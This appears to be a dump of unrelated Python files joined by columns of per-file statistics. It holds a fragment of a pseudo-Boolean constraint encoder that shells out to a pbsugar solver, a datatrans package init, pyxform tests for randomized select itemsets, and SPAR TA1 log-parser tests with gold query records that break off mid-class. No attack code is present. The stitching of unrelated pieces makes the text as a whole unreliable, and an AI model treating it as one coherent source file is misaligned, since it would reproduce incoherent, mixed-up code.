self.AssertPB(conditional_clause, val, "<", weights)
return condition
def conditionalPB_old(self, clause, val, constraint, weights=None, condition=None):
if condition is None:
condition = Var()
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(condition, Equal(c, v)))
self.AssertPB(conditional_clause, val, constraint, weights)
return condition
def conditionalPB(self, clause, val, constraint, weights=None, condition=None):
if condition is None:
condition = Var()
else:
v = Var()
AssertEq(v, Not(condition))
condition = v
"""
conditional_clause=[]
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(condition,Equal(c,v)))
self.AssertPB(conditional_clause,val,constraint,weights)
"""
if weights is None:
weights = []
while len(weights) < len(clause):
weights.append(1)
nclause = []
for v in clause:
# For now, it is a limitation of the pb constraint solver that all variables it deals with must be input variables in the circuit.
# So, we create them here if needed
# if(not v.isInput()):
# v2 = Var()
# Assert(Equal(v2,v))
# nclause.append(v2)
# else:
nclause.append(v)
if (
constraint == ">"
or constraint == ">="
or constraint == "="
or constraint == "=="
):
negWeightSum = 0
for w in weights:
if w < 0:
negWeightSum += abs(w)
total = negWeightSum + val
if constraint == ">":
total += 1
nclause.append(condition)
weights.append(total)
if constraint == ">" or constraint == ">=":
self.AssertPB(nclause, val, constraint, weights)
else:
self.AssertPB(nclause, val, ">=", weights)
nclause.pop()
weights.pop()
if (
constraint == "<"
or constraint == "<="
or constraint == "="
or constraint == "=="
):
posWeightSum = 0
for w in weights:
if w > 0:
posWeightSum += abs(w)
total = posWeightSum + val
if constraint == "<":
total += 1
nclause.append(condition)
weights.append(-total)
if constraint == "<" or constraint == "<=":
self.AssertPB(nclause, val, constraint, weights)
else:
self.AssertPB(nclause, val, "<=", weights)
nclause.pop()
weights.pop()
return Not(
condition
) # The property is enforced if the condition variable is false
def conditionalRangePB(
self, clause, lowerBound, upperBound, weights=None, condition=None
):
if lowerBound == upperBound:
return self.EqualPB(clause, lowerBound, weights, condition)
elif lowerBound is None:
return self.conditionalPB(clause, upperBound, "<=", weights, condition)
elif upperBound is None:
return self.conditionalPB(clause, lowerBound, ">=", weights, condition)
if condition is None:
condition = Var()
conditional_clause = []
for v in clause:
c = Var()
conditional_clause.append(c)
Assert(Implies(condition, Equal(c, v)))
self.AssertPB(conditional_clause, lowerBound, ">=", weights)
self.AssertPB(conditional_clause, upperBound, "<=", weights)
return condition
def LessThanPB(self, clause, val, weights=None, condition=None):
return self.conditionalPB(clause, val, "<", weights, condition)
def GreaterThanPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'>',weights))
return self.conditionalPB(clause, val, ">", weights, condition)
def LessEqPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'<=',weights))
return self.conditionalPB(clause, val, "<=", weights, condition)
def GreaterEqPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'>=',weights))
return self.conditionalPB(clause, val, ">=", weights, condition)
def EqualPB(self, clause, val, weights=None, condition=None):
# self.conditional_constraints.append((clause,val,condition,'=',weights))
return self.conditionalPB(clause, val, "=", weights, condition)
def write(self, cnf):
if len(self.constraints) == 0:
return
print("Encoding pb constraints")
fopb = open("convert.opb", "w")
nvars = 0
for (clause, val, op) in self.constraints:
for v in clause:
if v.getInputLiteral() > nvars:
nvars = v.getInputLiteral()
nvars += 1
fopb.write(
"* #variable= "
+ str(nvars)
+ " #constraint= "
+ str(len(self.constraints))
+ "\n"
)
for (clause, val, op) in self.constraints:
for v in clause:
fopb.write("+1 x" + str(v.getInputLiteral()) + " ")
fopb.write(op + " " + str(val) + " ;\n")
fopb.close()
os.system(
"./pbsugar -map convert.map -n -sat convert.cnf -jar ./pbsugar-v1-1-1.jar "
+ "convert.opb"
)
fmap = open("convert.map", "r")
count = int(fmap.readline())
varmap = dict()
maxvarmap = 0
for line in fmap.readlines():
line = line.split()
invar = int(line[0][1:])
outvar = int(line[1])
varmap[invar] = outvar
maxvarmap = max(maxvarmap, outvar)
fmap.close()
# now find the largest var in the cnf, so we can cleanly place the pb cnf in its own namespace
fcnf = open(cnf, "r")
vars = 0
for line in fcnf.readlines():
if line.startswith("p cnf"): # Header
header = line.split()
vars = int(header[2])
fcnf.close()
fcnf = open(cnf, "a")
fcnf.write("c pseudoboolean constraints:\n")
vars = max(vars, maxvarmap)
nextVar = vars + 1
convcnf = open("convert.cnf", "r")
for line in convcnf.readlines():
if line.startswith("p cnf"): # Header
header = line.split()
# vars = int(header[2])
elif line.startswith("c"):
pass
elif len(line.split()) == 0:
pass
else:
clause = list(map(int, line.split()))
assert len(clause) > 1
assert clause[-1] == 0
for l in clause:
if l == 0:
continue
v = abs(l)
if v not in varmap:
varmap[v] = nextVar
nextVar += 1
v = varmap[v]
if l < 0:
v = -v
fcnf.write(str(v) + " ")
fcnf.write("0\n")
fcnf.write("c end of pseudoboolean constraints\n")
fcnf.close()
def AssertLessThanPB(clause, val, weights=None):
PBManager().AssertPB(clause, val, "<", weights)
def AssertGreaterThanPB(clause, val, weights=None):
PBManager().AssertPB(clause, val, ">", weights)
def AssertLessEqPB(clause, val, weights=None):
PBManager().AssertPB(clause, val, "<=", weights)
def AssertGreaterEqPB(clause, val, weights=None):
PBManager().AssertPB(clause, val, ">=", weights)
def AssertEqualPB(clause, val, weights=None):
PBManager().AssertPB(clause, val, "=", weights)
def AssertNotEqualPB(clause, val, weights=None):
PBManager().AssertPB(clause, val, "!=", weights)
def AssertRangePB(clause, lowerBound, upperBound, weights=None):
PBManager().pb.AssertRangePB(clause, lowerBound, upperBound, weights)
def AssertPB(clause, val, constraint, weights=None):
PBManager().pb.AssertPB(clause, val, constraint, weights)
def twoSidedRangePB(clause, lowerBound, upperBound, weights=None):
return PBManager().pb.twoSidedRangePB(clause, lowerBound, upperBound, weights)
def twoSidedPB(clause, val, constraint, weights=None, condition=None):
return PBManager().pb.twoSidedPB(clause, val, constraint, weights, condition)
def conditionalPB(clause, val, constraint, weights=None, condition=None):
return PBManager().pb.conditionalPB(clause, val, constraint, weights, condition)
def conditionalRangePB(clause, lowerBound, upperBound, weights=None, condition=None):
return PBManager().pb.conditionalRangePB(
clause, lowerBound, upperBound, weights, condition
)
def LessThanPB(clause, val, weights=None, condition=None):
return PBManager().conditionalPB(clause, val, "<", weights, condition)
def GreaterThanPB(clause, val, weights=None, condition=None):
return PBManager().conditionalPB(clause, val, ">", weights, condition)
def LessEqPB(clause, val, weights=None, condition=None):
return PBManager().conditionalPB(clause, val, "<=", weights, condition)
def GreaterEqPB(clause, val, weights=None, condition=None):
return PBManager().conditionalPB(clause, val, ">=", weights, condition)
def EqualPB(clause, val, weights=None, condition=None):
return PBManager().conditionalPB(clause, val, "=", weights, condition)
def AssertExactlyOne(clause):
PBManager().AssertExactlyOne(clause)
def AssertAtMostOne(clause):
PBManager().AssertAtMostOne(clause)
# shutil.which, backported from the python 3.3 sources, if python version < 3.3
# The 'which' function included here falls under Python's PSF
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return os.path.exists(fn) and os.access(fn, mode) and not os.path.isdir(fn)
# Short circuit. If we're given a full path which matches the mode
# and it exists, we're done here.
if _access_check(cmd, mode):
return cmd
path = (path or os.environ.get("PATH", os.defpath)).split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if not os.curdir in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
matches = [cmd for ext in pathext if cmd.lower().endswith(ext.lower())]
# If it does match, only test that one, otherwise we have to try
# others.
files = [cmd] if matches else [cmd + ext.lower() for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
dir = os.path.normcase(dir)
if not dir in seen:
seen.add(dir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
| 36.586675
| 174
| 0.56592
| 6,149
| 59,307
| 5.428362
| 0.084404
| 0.058779
| 0.075257
| 0.037149
| 0.807963
| 0.796459
| 0.783157
| 0.777794
| 0.759579
| 0.742113
| 0
| 0.003848
| 0.32089
| 59,307
| 1,620
| 175
| 36.609259
| 0.824908
| 0.162207
| 0
| 0.733032
| 0
| 0.00181
| 0.031738
| 0
| 0
| 0
| 0
| 0
| 0.152941
| 1
| 0.122172
| false
| 0.006335
| 0.011765
| 0.039819
| 0.238914
| 0.004525
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e810e506556a302cd54508a74967600b9d95880e
| 419
|
py
|
Python
|
datatrans/structured_data/__init__.py
|
KooCook/datatrans
|
65c80da4d8a1ed67963b9d704b361c864cb1151b
|
[
"BSD-3-Clause"
] | 1
|
2020-10-24T04:07:42.000Z
|
2020-10-24T04:07:42.000Z
|
datatrans/structured_data/__init__.py
|
KooCook/datatrans
|
65c80da4d8a1ed67963b9d704b361c864cb1151b
|
[
"BSD-3-Clause"
] | null | null | null |
datatrans/structured_data/__init__.py
|
KooCook/datatrans
|
65c80da4d8a1ed67963b9d704b361c864cb1151b
|
[
"BSD-3-Clause"
] | null | null | null |
from datatrans.structured_data.base import *
from datatrans.structured_data.carousel import ItemList, ItemListOrderType, ListItem
from datatrans.structured_data.lower import *
from datatrans.structured_data.person import Person
from datatrans.structured_data.recipe import NutritionInformation, Recipe
from datatrans.structured_data.review import AggregateRating
from datatrans.structured_data.video import VideoObject
| 52.375
| 84
| 0.880668
| 50
| 419
| 7.24
| 0.36
| 0.251381
| 0.444751
| 0.522099
| 0.18232
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073986
| 419
| 7
| 85
| 59.857143
| 0.93299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1c48dfb24d4b32da11dc3b82cac98790cf672df3
| 10,254
|
py
|
Python
|
pyxform/tests_v1/test_randomize_itemsets.py
|
PMA-2020/pmaxform3
|
9d36f97f25cb09f0fb8aafb69370454731ecbbd5
|
[
"BSD-2-Clause"
] | 1
|
2020-10-19T15:37:36.000Z
|
2020-10-19T15:37:36.000Z
|
pyxform/tests_v1/test_randomize_itemsets.py
|
PMA-2020/pmaxform3
|
9d36f97f25cb09f0fb8aafb69370454731ecbbd5
|
[
"BSD-2-Clause"
] | 1
|
2022-03-16T13:48:25.000Z
|
2022-03-17T07:33:15.000Z
|
pyxform/tests_v1/test_randomize_itemsets.py
|
PMA-2020/pmaxform3
|
9d36f97f25cb09f0fb8aafb69370454731ecbbd5
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Test randomize itemsets.
"""
from pyxform.tests_v1.pyxform_test_case import PyxformTestCase
class RandomizeItemsetsTest(PyxformTestCase):
def test_randomized_select_one(self):
self.assertPyxformXform(
name="data",
md="""
| survey | | | | |
| | type | name | label | parameters |
| | select_one choices | select | Select| randomize=true |
| choices| | | | |
| | list_name | name | label | |
| | choices | a | opt_a | |
| | choices | b | opt_b | |
""",
xml__contains=[
"<itemset nodeset=\"randomize(instance('choices')/root/item)\">"
],
)
def test_randomized_seeded_select_one(self):
self.assertPyxformXform(
name="data",
md="""
| survey | | | | |
| | type | name | label | parameters |
| | select_one choices | select | Select| randomize=true, seed=42 |
| choices| | | | |
| | list_name | name | label | |
| | choices | a | opt_a | |
| | choices | b | opt_b | |
""",
xml__contains=[
"<itemset nodeset=\"randomize(instance('choices')/root/item, 42)\">"
],
)
def test_randomized_seeded_select_one_nameset_seed(self):
self.assertPyxformXform(
name="data",
md="""
| survey | | | | | |
| | type | name | label | parameters | calculation |
| | calculate | seed | | | once(decimal-date-time(now())) |
| | select_one choices | select | Select| randomize=true,seed=${seed} | |
| choices| | | | | |
| | list_name | name | label | | |
| | choices | a | opt_a | | |
| | choices | b | opt_b | | |
""",
xml__contains=[
"<itemset nodeset=\"randomize(instance('choices')/root/item, /data/seed)\">"
],
)
def test_randomized_seeded_filtered_select_one(self):
self.assertPyxformXform(
name="data",
md="""
| survey | | | | | |
| | type | name | label | parameters | choice_filter |
| | select_one choices | select | Select| randomize=true, seed=42 | name='a' |
| choices| | | | | |
| | list_name | name | label | | |
| | choices | a | opt_a | | |
| | choices | b | opt_b | | |
""",
xml__contains=[
"<itemset nodeset=\"randomize(instance('choices')/root/item[name='a'], 42)\">"
],
)
def test_randomized_select_multiple(self):
self.assertPyxformXform(
name="data",
md="""
| survey | | | | |
| | type | name | label | parameters |
| | select_multiple choices | select | Select| randomize=true |
| choices| | | | |
| | list_name | name | label | |
| | choices | a | opt_a | |
| | choices | b | opt_b | |
""",
xml__contains=[
"<itemset nodeset=\"randomize(instance('choices')/root/item)\">"
],
)
def test_randomized_seeded_select_multiple(self):
self.assertPyxformXform(
name="data",
md="""
| survey | | | | |
| | type | name | label | parameters |
| | select_multiple choices | select | Select| randomize=true, seed=42 |
| choices| | | | |
| | list_name | name | label | |
| | choices | a | opt_a | |
| | choices | b | opt_b | |
""",
xml__contains=[
"<itemset nodeset=\"randomize(instance('choices')/root/item, 42)\">"
],
)
def test_randomized_external_xml_instance(self):
self.assertPyxformXform(
name="ecsv",
md="""
| survey | | | | |
| | type | name | label | parameters |
| | select_one_from_file cities.xml | city | City | randomize=true |
""",
xml__contains=[
"<itemset nodeset=\"randomize(instance('cities')/root/item)\">"
],
)
def test_randomized_select_one_bad_param(self):
self.assertPyxformXform(
name="data",
errored="true",
md="""
| survey | | | | |
| | type | name | label | parameters |
| | select_one choices | select | Select| step=10 |
| choices| | | | |
| | list_name | name | label | |
| | choices | a | opt_a | |
| | choices | b | opt_b | |
""",
error__contains=[
"Accepted parameters are 'randomize, seed': 'step' is an invalid parameter."
],
)
def test_randomized_select_one_bad_randomize(self):
self.assertPyxformXform(
name="data",
errored="true",
md="""
| survey | | | | |
| | type | name | label | parameters |
| | select_one choices | select | Select| randomize=ukanga |
| choices| | | | |
| | list_name | name | label | |
| | choices | a | opt_a | |
| | choices | b | opt_b | |
""",
error__contains=[
"randomize must be set to true or false: 'ukanga' is an invalid value"
],
)
def test_randomized_select_one_bad_seed(self):
self.assertPyxformXform(
name="data",
errored="true",
md="""
| survey | | | | |
| | type | name | label | parameters |
| | select_one choices | select | Select| randomize=true, seed=ukanga |
| choices| | | | |
| | list_name | name | label | |
| | choices | a | opt_a | |
| | choices | b | opt_b | |
""",
error__contains=[
"seed value must be a number or a reference to another field."
],
)
def test_randomized_select_one_seed_without_randomize(self):
self.assertPyxformXform(
name="data",
errored="true",
md="""
| survey | | | | |
| | type | name | label | parameters |
| | select_one choices | select | Select| seed=42 |
| choices| | | | |
| | list_name | name | label | |
| | choices | a | opt_a | |
| | choices | b | opt_b | |
""",
error__contains=["Parameters must include randomize=true to use a seed."],
)
| 50.019512
| 125
| 0.302906
| 573
| 10,254
| 5.212914
| 0.153578
| 0.063274
| 0.062605
| 0.110479
| 0.804151
| 0.787077
| 0.73619
| 0.73619
| 0.707734
| 0.691999
| 0
| 0.004465
| 0.606885
| 10,254
| 204
| 126
| 50.264706
| 0.736542
| 0.004584
| 0
| 0.740113
| 0
| 0.00565
| 0.734288
| 0.005589
| 0
| 0
| 0
| 0
| 0.062147
| 1
| 0.062147
| false
| 0
| 0.00565
| 0
| 0.073446
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1c520abe54f5d75ef1ea1dbc65fc919bc36d827b
| 21,193
|
py
|
Python
|
spar_python/analytics/ta1/parse_client_harness_log_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | 37
|
2017-06-09T13:55:23.000Z
|
2022-01-28T12:51:17.000Z
|
spar_python/analytics/ta1/parse_client_harness_log_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | null | null | null |
spar_python/analytics/ta1/parse_client_harness_log_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | 5
|
2017-06-09T13:55:26.000Z
|
2021-11-11T03:51:56.000Z
|
# *****************************************************************
# Copyright 2013 MIT Lincoln Laboratory
# Project: SPAR
# Authors: Tim Meunier
# Description: Unit tests for the perfomer queries log file
# parser
# *****************************************************************
import unittest
import StringIO
import os
import sys
this_dir = os.path.dirname(os.path.abspath(__file__))
base_dir = os.path.join(this_dir, '..', '..', '..')
sys.path.append(base_dir)
import spar_python.report_generation.ta1.ta1_schema as ta1_schema
import spar_python.analytics.ta1.parse_client_harness_log as parse_client_harness
import spar_python.analytics.common.log_parser_util as log_parser_util
class ParsePerfLogTest(unittest.TestCase):
"""Test performer queries log parser"""
maxDiff = None
# command id 33-1
gold_query1 = {ta1_schema.DBP_PERFORMERNAME: 'IBM',
ta1_schema.DBP_FQID : 2384,
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_QUERYLATENCY : repr(0.10711013292893767),
ta1_schema.DBP_EVENTMSGTIMES : [],
ta1_schema.DBP_EVENTMSGIDS : [],
ta1_schema.DBP_EVENTMSGVALS : [],
ta1_schema.DBP_RESULTSTIME : repr(3305997.545109896),
ta1_schema.DBP_SENDTIME : repr(3305997.437999763),
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_RETURNEDRECORDHASHES : [],
ta1_schema.DBP_RETURNEDRECORDIDS :
[ '42825118908495',
'44435731644979',
'95438468284621',
'171815871709769',
'178893977813230',
'205058918580953',
'273198574731828',
'279383327637992',
'318944271401057',
'348897373323835',
'349017632408193',
'380267814454218',
'386091790107092',
'404590214250850',
'410555923825061',
'416371309544263',
'425210352239438',
'425738633216567'],
ta1_schema.DBP_SELECTIONCOLS : 'id',
ta1_schema.DBP_ISMODIFICATIONQUERY : 0,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 0}
# command id 36-4
gold_query2 = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 90,
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_QUERYLATENCY : repr(670.1062920428813),
ta1_schema.DBP_EVENTMSGTIMES : [],
ta1_schema.DBP_EVENTMSGIDS : [],
ta1_schema.DBP_EVENTMSGVALS : [],
ta1_schema.DBP_RESULTSTIME : repr(3306667.545109896),
ta1_schema.DBP_SENDTIME : repr(3305997.438817853),
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_RETURNEDRECORDHASHES : [],
ta1_schema.DBP_RETURNEDRECORDIDS : ['123', '456', '789'],
ta1_schema.DBP_SELECTIONCOLS : 'id, data',
ta1_schema.DBP_ISMODIFICATIONQUERY : 0,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 0}
# command id 35-3
gold_query3 = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 28,
ta1_schema.DBP_QUERYLATENCY : repr(553.1068647759967),
ta1_schema.DBP_EVENTMSGTIMES : [],
ta1_schema.DBP_EVENTMSGIDS : [],
ta1_schema.DBP_EVENTMSGVALS : [],
ta1_schema.DBP_RESULTSTIME : repr(3306550.545432123),
ta1_schema.DBP_SENDTIME : repr(3305997.438567347),
ta1_schema.DBP_STATUS : ['FAILED', 'Some', 'failure',
'results', 'FAILED', 'Second',
'failure', 'results'],
ta1_schema.DBP_RETURNEDRECORDHASHES : [],
ta1_schema.DBP_RETURNEDRECORDIDS : ['111111111111111',
'555555555555555',
'999999999999999'],
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_SELECTIONCOLS : 'id',
ta1_schema.DBP_ISMODIFICATIONQUERY : 0,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 0}
# command id 34-2
gold_query4 = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 5847,
ta1_schema.DBP_QUERYLATENCY : repr(670.5616685952991),
ta1_schema.DBP_EVENTMSGTIMES : ['3305997.438667347',
'3305997.448667347',
'3305997.545209896',
'3306555.545432123',
'3306667.545209896',
'3306668.545209896'],
ta1_schema.DBP_EVENTMSGIDS : ['1', '2', '3', '4', '5', '6'],
ta1_schema.DBP_EVENTMSGVALS : ['', '22', '', '44', '', ''],
ta1_schema.DBP_RESULTSTIME : repr(3306667.999999999),
ta1_schema.DBP_SENDTIME : repr(3305997.438331404),
ta1_schema.DBP_RETURNEDRECORDHASHES :
['ffffffffffffffffffff',
'3a677e6490ff058c492d',
'55f729ab502948d9375c'],
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_RETURNEDRECORDIDS : ['13857229552',
'487575939385',
'677029582263'],
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_SELECTIONCOLS : '*',
ta1_schema.DBP_ISMODIFICATIONQUERY : 0,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 0}
# copy of command id 34-2
gold_mod_query = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 5847,
ta1_schema.DBP_QUERYLATENCY : repr(670.5616685952991),
ta1_schema.DBP_EVENTMSGTIMES : ['3305997.438667347',
'3305997.448667347',
'3305997.545209896',
'3306555.545432123',
'3306667.545209896',
'3306668.545209896'],
ta1_schema.DBP_EVENTMSGIDS : ['1', '2', '3', '4', '5', '6'],
ta1_schema.DBP_EVENTMSGVALS : ['', '22', '', '44', '', ''],
ta1_schema.DBP_RESULTSTIME : repr(3306667.999999999),
ta1_schema.DBP_SENDTIME : repr(3305997.438331404),
ta1_schema.DBP_RETURNEDRECORDHASHES :
['ffffffffffffffffffff',
'3a677e6490ff058c492d',
'55f729ab502948d9375c'],
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_RETURNEDRECORDIDS : ['13857229552',
'487575939385',
'677029582263'],
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_SELECTIONCOLS : '*',
ta1_schema.DBP_ISMODIFICATIONQUERY : 1,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 0}
# copy of command id 34-2
gold_tp_query = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 5847,
ta1_schema.DBP_QUERYLATENCY : repr(670.5616685952991),
ta1_schema.DBP_EVENTMSGTIMES : ['3305997.438667347',
'3305997.448667347',
'3305997.545209896',
'3306555.545432123',
'3306667.545209896',
'3306668.545209896'],
ta1_schema.DBP_EVENTMSGIDS : ['1', '2', '3', '4', '5', '6'],
ta1_schema.DBP_EVENTMSGVALS : ['', '22', '', '44', '', ''],
ta1_schema.DBP_RESULTSTIME : repr(3306667.999999999),
ta1_schema.DBP_SENDTIME : repr(3305997.438331404),
ta1_schema.DBP_RETURNEDRECORDHASHES :
['ffffffffffffffffffff',
'3a677e6490ff058c492d',
'55f729ab502948d9375c'],
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_RETURNEDRECORDIDS : ['13857229552',
'487575939385',
'677029582263'],
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_SELECTIONCOLS : '*',
ta1_schema.DBP_ISMODIFICATIONQUERY : 0,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 1}
gold_log = """[2936548.490002438] 2013-05-30 13:34:43 IBM-dbname-001_something_something
[2936548.490002438] Invoked from /home/lincoln/spar-testing/bin/
[2936548.490002438] NOTE: ID x-y QID z = x-globalID, y-localID, z-resultsDBQueryID
[3305996.925772338] VariableDelayQueryRunner queries/10T/p3-notes3.sql 1 NO_DELAY
[3305997.437652770] EPOCH_TIME: 1305997.437652770
[3305997.437999763] ID 33-1 sent
[3305997.438091660] ID 33-1 QID 2384: [[SELECT id FROM main WHERE CONTAINED_IN(notes3, 'tourments')]]
[3305997.438119056] ID 34-2 QID 5847: [[SELECT * FROM main WHERE CONTAINED_IN(notes3, 'erit')]]
[3305997.438120347] ID 34-2 event 0 occurred
[3305997.438122770] EPOCH_TIME: 1305997.438122770
[3305997.438141846] ID 35-3 QID 28: [[SELECT id FROM main WHERE CONTAINED_IN(notes3, 'nehmen')]]
[3305997.438163889] ID 36-4 QID 90: [[SELECT id, data FROM main WHERE CONTAINED_IN(notes3, 'l\'ennemi')]]
[3305997.438331404] ID 34-2 sent
[3305997.438567347] ID 35-3 sent
[3305997.438667347] ID 34-2 event 1 occurred
[3305997.438817853] ID 36-4 sent
[3305997.448667347] ID 34-2 event 2 with value [[22]] occurred
[3305997.545109896] ID 33-1 results:
380267814454218
95438468284621
44435731644979
42825118908495
205058918580953
404590214250850
348897373323835
[3305997.545209896] ID 34-2 event 3 occurred
349017632408193
279383327637992
178893977813230
425210352239438
318944271401057
425738633216567
416371309544263
171815871709769
273198574731828
410555923825061
386091790107092
[3306550.545432123] ID 35-3 results:
111111111111111
FAILED
Some
failure
results
ENDFAILED
555555555555555
FAILED
Second
failure
[3306555.545432123] ID 34-2 event 4 with value [[44]] occurred
results
ENDFAILED
999999999999999
[3306667.545209896] ID 34-2 event 5 occurred
[3306667.545109896] ID 36-4 results:
123
456
789
[3306667.999999999] ID 34-2 results:
677029582263 55f729ab502948d9375c
487575939385 3a677e6490ff058c492d
13857229552 ffffffffffffffffffff
[3306668.545209896] ID 34-2 event 6 occurred
[3306669.545209896] ID 99-9 event 6 occurred
[3306669.545209897] END_OF_LOG
"""
gold_log_abort = """[2936548.490002438] 2013-05-30 13:34:43 IBM-dbname-001_something_something
[2936548.490002438] Invoked from /home/lincoln/spar-testing/bin/
[2936548.490002438] NOTE: ID x-y QID z = x-globalID, y-localID, z-resultsDBQueryID
[3305996.925772338] VariableDelayQueryRunner queries/10T/p3-notes3.sql 1 NO_DELAY
[3305997.437652770] EPOCH_TIME: 1305997.437652770
[3305997.437999763] ID 33-1 sent
[3305997.438091660] ID 33-1 QID 2384: [[SELECT id FROM main WHERE CONTAINED_IN(notes3, 'tourments')]]
[3305997.438119056] ID 34-2 QID 5847: [[SELECT * FROM main WHERE CONTAINED_IN(notes3, 'erit')]]
[3305997.438120347] ID 34-2 event 0 occurred
[3305997.438122770] EPOCH_TIME: 1305997.438122770
[3305997.438141846] ID 35-3 QID 28: [[SELECT id FROM main WHERE CONTAINED_IN(notes3, 'nehmen')]]
[3305997.438163889] ID 36-4 QID 90: [[SELECT id, data FROM main WHERE CONTAINED_IN(notes3, 'l\'ennemi')]]
[3305997.438331404] ID 34-2 sent
[3305997.438567347] ID 35-3 sent
[3305997.438667347] ID 34-2 event 1 occurred
[3305997.438817853] ID 36-4 sent
[3305997.448667347] ID 34-2 event 2 with value [[22]] occurred
[3305997.545109896] ID 33-1 results:
380267814454218
95438468284621
44435731644979
42825118908495
205058918580953
404590214250850
348897373323835
[3305997.545209896] ID 34-2 event 3 occurred
349017632408193
279383327637992
178893977813230
425210352239438
318944271401057
425738633216567
416371309544263
171815871709769
273198574731828
410555923825061
386091790107092
[3306550.545432123] ID 35-3 results:
111111111111111
FAILED
Some
failure
results
ENDFAILED
555555555555555
FAILED
Second
failure
[3306555.545432123] ID 34-2 event 4 with value [[44]] occurred
results
ENDFAILED
999999999999999
[3306667.545209896] ID 34-2 event 5 occurred
[3306667.545109896] ID 36-4 results:
123
456
789
[3306667.999999999] ID 34-2 results:
677029582263 55f729ab502948d9375c
487575939385 3a677e6490ff058c492d
13857229552 ffffffffffffffffffff
[3306668.545209896] ID 34-2 event 6 occurred
[3306669.545209896] ID 99-9 event 6 occurred
[3306670.437999763] ID 39-1 sent
[3306670.438091660] ID 39-1 QID 1123: [[SELECT id FROM main WHERE CONTAINED_IN(notes3, 'basketball')]]
[3306670.545109896] ID 39-1 results:
425210352239438
318944271401057
425738633216567
416371309544263
171815871709769
"""
def _ut_record_func(self, query_info, command_id, results_db):
"""Test function to fake writing of data to a DB"""
if (command_id == "33-1"):
self.assertEqual(query_info, self.gold_query1)
elif (command_id == "36-4"):
self.assertEqual(query_info, self.gold_query2)
# FAILED query test
elif (command_id == "35-3"):
self.assertEqual(query_info, self.gold_query3)
# Query with hashes in results and select * and events
elif (command_id == "34-2"):
self.assertEqual(query_info, self.gold_query4)
# Test for process_query()
elif (command_id == '10-1'):
self.assertEqual(query_info, self.gold_query4)
# Test modification query for process_query()
elif (command_id == '10-2'):
self.assertEqual(query_info, self.gold_mod_query)
# Test throughput query for process_query()
elif (command_id == '10-3'):
self.assertEqual(query_info, self.gold_tp_query)
else:
self.failureException('Unexpected command_id found')
return 1
def test_parse_queries(self):
